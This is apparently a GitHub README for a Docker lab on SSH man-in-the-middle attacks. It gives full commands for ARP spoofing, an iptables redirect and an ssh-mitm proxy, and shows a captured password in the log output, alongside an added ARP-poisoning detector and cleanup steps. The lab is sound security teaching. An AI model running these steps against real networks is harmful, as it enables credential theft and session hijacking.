Lab for learning SSH Man-in-the-Middle (MITM) attacks using ARP spoofing and credential interception.

rootandbeer/ssh-mitm-lab

SSH MITM Attack Lab

OFFICIAL DOCUMENTATION IS AT www.rootandbeer.com/labs/ssh-mitm. Please visit the website for the most up-to-date documentation on this lab.

Introduction

Prerequisites: Docker-ce, SSH-MITM, arpspoof

This lab demonstrates how to perform a Man-in-the-Middle (MITM) attack on SSH connections using ARP spoofing and SSH-MITM. You will learn to intercept SSH traffic between a client and server, redirecting it through a proxy to capture credentials and monitor sessions in real-time. The lab uses Docker containers to create a controlled network environment for ethical security testing.


Lab Environment

Description          Hostname        IP Address     USERNAME:PASSWORD
Gateway              -               172.25.0.1     -
SSH Server (Target)  ssh-server      172.25.0.10    admin:P@assw0rd123
Victim Client        victim-client   172.25.0.20    targetuser:supersecret

Setup

Clone the repository:

git clone http://www.github.com/rootandbeer/ssh-mitm-lab
cd ssh-mitm-lab


Start the target environment:

sudo docker compose up -d
# Wait for services to initialize


Create and Launch Python VENV:

python3 -m venv ~/.venv/ssh-mitm
source ~/.venv/ssh-mitm/bin/activate


Install ssh-mitm

python3 -m pip install "ssh-mitm[production]"

Network Configuration

Identify the Docker bridge interface:

# Find Docker bridge interface
export BRIDGE="br-$(sudo docker network ls | awk '/mitm_network/ {print $1}')"

echo "Bridge: $BRIDGE"

[!warning] Most networks will use eth0 (use ifconfig or ip link to verify in real-world applications); since this lab runs in Docker, however, we have to find the specific Docker bridge interface.

Configure IP Forwards & NAT Redirects

Enable IP forwarding:

sudo sysctl -w net.ipv4.ip_forward=1


Verify the change:

cat /proc/sys/net/ipv4/ip_forward  # Should show: 1


Redirect SSH traffic to the ssh-mitm proxy:

sudo iptables -t nat -A PREROUTING -i "$BRIDGE" -p tcp -d 172.25.0.10 --dport 22 -j DNAT --to-destination 172.25.0.1:22


Verify the iptables rule was added:

sudo iptables -t nat -L PREROUTING -n -v

Attack Execution

This attack simulation uses 3 terminals.

[!note] Terminal 1 - Start the SSH MITM proxy

Basic configuration:

ssh-mitm server \
   --remote-host 172.25.0.10 \
   --listen-port 22 \
   --listen-address 172.25.0.1

[!important] Terminal 2 - Start ARP spoofing:

Keep this terminal running continuously throughout the attack

sudo arpspoof -i $BRIDGE -t 172.25.0.20 172.25.0.10

[!warning] Terminal 3 - Simulate victim SSH connection

Access the victim container:

sudo docker exec -it victim-client bash


From inside the container, connect to the SSH server:

ssh targetuser@172.25.0.10
# When prompted, enter password: supersecret
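Seen from the victim's side, the arpspoof step above leaves a tell-tale trace: the gateway (172.25.0.1) and the SSH server (172.25.0.10) both resolve to the same hardware address in the neighbour table. The following added example (not part of the ssh-mitm-lab repository) parses a constructed /proc/net/arp dump and flags both that duplicate and any drift from a pinned baseline MAC; all MAC addresses in it are made up.

```python
"""Detect ARP cache poisoning of the kind the lab's arpspoof step produces.
Added example, not code from the ssh-mitm-lab repo; the table below is a
constructed /proc/net/arp as it might look on victim-client mid-attack."""
from collections import defaultdict

# Constructed /proc/net/arp contents: 172.25.0.1 (gateway) and 172.25.0.10
# (SSH server) share one MAC because the attacker answers ARP for the server.
SAMPLE_ARP_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
172.25.0.1       0x1         0x2         02:42:aa:bb:cc:01     *        eth0
172.25.0.10      0x1         0x2         02:42:aa:bb:cc:01     *        eth0
172.25.0.30      0x1         0x2         02:42:de:ad:be:ef     *        eth0
"""


def parse_arp_table(text):
    """Return {ip: mac} for complete (flag 0x2) entries of a /proc/net/arp dump."""
    entries = {}
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, flags, mac = fields[0], fields[2], fields[3]
        if flags == "0x2" and mac != "00:00:00:00:00:00":
            entries[ip] = mac.lower()
    return entries


def find_shared_macs(entries):
    """Group IPs by MAC; a MAC claimed by more than one IP is a poisoning sign."""
    by_mac = defaultdict(list)
    for ip, mac in entries.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def check_expected(entries, expected):
    """Compare against a pinned {ip: mac} baseline; return IPs whose MAC differs."""
    return {ip: entries[ip] for ip, mac in expected.items()
            if ip in entries and entries[ip] != mac.lower()}


if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_TABLE)
    for mac, ips in find_shared_macs(table).items():
        print(f"ALERT: {mac} claimed by {', '.join(ips)}")
    baseline = {"172.25.0.10": "02:42:aa:bb:cc:10"}  # pinned server MAC (constructed)
    for ip, mac in check_expected(table, baseline).items():
        print(f"ALERT: {ip} now resolves to {mac}, expected {baseline[ip]}")
```

On a live Linux host, pass the contents of /proc/net/arp (or a static mapping you recorded before the lab) to these functions; the gateway and server sharing the bridge MAC is exactly what the arpspoof step above produces on the victim.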

Monitor Captured Credentials

Watch Terminal 1 (ssh-mitm output) for captured credentials:

[01/03/26 15:14:14] INFO     Remote authentication succeeded
                                     Remote Address: 172.25.0.10:22
                                     Username: targetuser
                                     Password: supersecret
                                     Agent: no agent
                    INFO     ℹ 265e4691-d19b-4826-a32c-4b140920a30c - local port forwarding
                             SOCKS port: 39407
                               SOCKS4:
                                 * socat: socat TCP-LISTEN:LISTEN_PORT,fork socks4:127.0.0.1:DESTINATION_ADDR:DESTINATION_PORT,socksport=39407
                                 * netcat: nc -X 4 -x localhost:39407 address port
                               SOCKS5:
                                 * netcat: nc -X 5 -x localhost:39407 address port
[01/03/26 15:14:15] INFO     ℹ 265e4691-d19b-4826-a32c-4b140920a30c - session started
                    INFO     ℹ created mirrorshell on port 38099. connect with: ssh -p 38099 127.0.0.1

Optional: Packet Capture

Terminal 4 - Capture traffic for analysis:

Start capturing SSH traffic:

sudo tcpdump -i $BRIDGE -w /tmp/ssh-mitm.pcap "host 172.25.0.20 and port 22"


Analyze the captured packets:

# View packet contents in ASCII
tcpdump -r /tmp/ssh-mitm.pcap -A

# Open in Wireshark for detailed analysis
wireshark /tmp/ssh-mitm.pcap

Cleanup

Remove iptables Rules

Remove the specific PREROUTING rule:

sudo iptables -t nat -D PREROUTING -i "$BRIDGE" -p tcp -d 172.25.0.10 --dport 22 -j DNAT --to-destination 172.25.0.1:22


Alternatively, flush all NAT rules (use with caution):

sudo iptables -t nat -F

Restore Environment

Disable IP forwarding:

sudo sysctl -w net.ipv4.ip_forward=0


Stop and remove the Docker containers:

sudo docker compose down


⭐ Please give a Star if you enjoyed this lab ⭐
